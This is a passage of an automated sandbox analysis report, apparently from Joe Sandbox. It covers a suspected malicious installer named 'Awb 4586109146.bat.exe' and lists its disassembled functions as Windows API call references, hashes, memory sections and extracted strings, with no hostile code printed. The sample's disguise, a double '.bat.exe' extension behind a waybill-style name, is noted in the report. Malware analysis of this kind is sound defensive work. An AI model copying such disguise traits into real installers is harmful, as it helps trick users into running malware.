                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: A$C:\Users\user\AppData\Local\sillinesses$Call
                                                                    • API String ID: 2624150263-3466314681
                                                                    • Opcode ID: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                    • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                                    • Opcode Fuzzy Hash: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                    • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: p!C$p!C
                                                                    • API String ID: 0-3125587631
                                                                    • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                    • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                                                    • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                    • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                    • Instruction ID: 703def0becceeecb9d8561ea32c53bcab4b84ebc773a8a1d0b412cad538f794c
                                                                    • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                    • Instruction Fuzzy Hash: 1EE1797190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040448E
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                    • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004044BF
                                                                    • GetSysColor.USER32(?), ref: 004044D0
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                    • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                    • SendMessageW.USER32(00000000), ref: 00404573
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                    • SetCursor.USER32(00000000), ref: 004045F2
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                    • SetCursor.USER32(00000000), ref: 0040460E
                                                                    • SendMessageW.USER32(00000111,?,00000000), ref: 0040463D
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                    • String ID: Call$N$gC@
                                                                    • API String ID: 3103080414-2733886405
                                                                    • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                    • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                                    • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                    • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextW.USER32(00000000,Footballer Setup,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F$Footballer Setup
                                                                    • API String ID: 941294808-2802707411
                                                                    • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                    • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                    • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                    • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                    • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                                      • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                      • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                    • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                                    • wsprintfA.USER32 ref: 00405F85
                                                                    • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                                    • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                                      • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Awb 4586109146.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                      • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                    • String ID: %ls=%ls$[Rename]
                                                                    • API String ID: 2171350718-461813615
                                                                    • Opcode ID: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                    • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                                    • Opcode Fuzzy Hash: 19ce75182fe0bcfe9ef27c5950cf2d0ac50ba1a4511b366fbaff45796f309885
                                                                    • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                    • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                    • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040336A,C:\Users\user\AppData\Local\Temp\,75573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 589700163-3813581078
                                                                    • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                    • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                                    • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                    • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                                    • GetSysColor.USER32(00000000), ref: 004042F3
                                                                    • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                                    • SetBkMode.GDI32(?,?), ref: 0040430B
                                                                    • GetSysColor.USER32(?), ref: 0040431E
                                                                    • SetBkColor.GDI32(?,?), ref: 0040432E
                                                                    • DeleteObject.GDI32(?), ref: 00404348
                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                    • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                                    • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                    • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                                    • GetMessagePos.USER32 ref: 00404C0F
                                                                    • ScreenToClient.USER32(?,?), ref: 00404C29
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                    • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                                    • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                    • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401DBC
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                    • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID: Calibri
                                                                    • API String ID: 3808545654-1409258342
                                                                    • Opcode ID: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                    • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                                    • Opcode Fuzzy Hash: f18babf6a3f54167651d4878a138e52fe532a855dc2a3d8ed9c0da916718800c
                                                                    • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                                    APIs
                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                    • MulDiv.KERNEL32(000C23A2,00000064,000C23A6), ref: 00402E3C
                                                                    • wsprintfW.USER32 ref: 00402E4C
                                                                    • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                    Strings
                                                                    • verifying installer: %d%%, xrefs: 00402E46
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
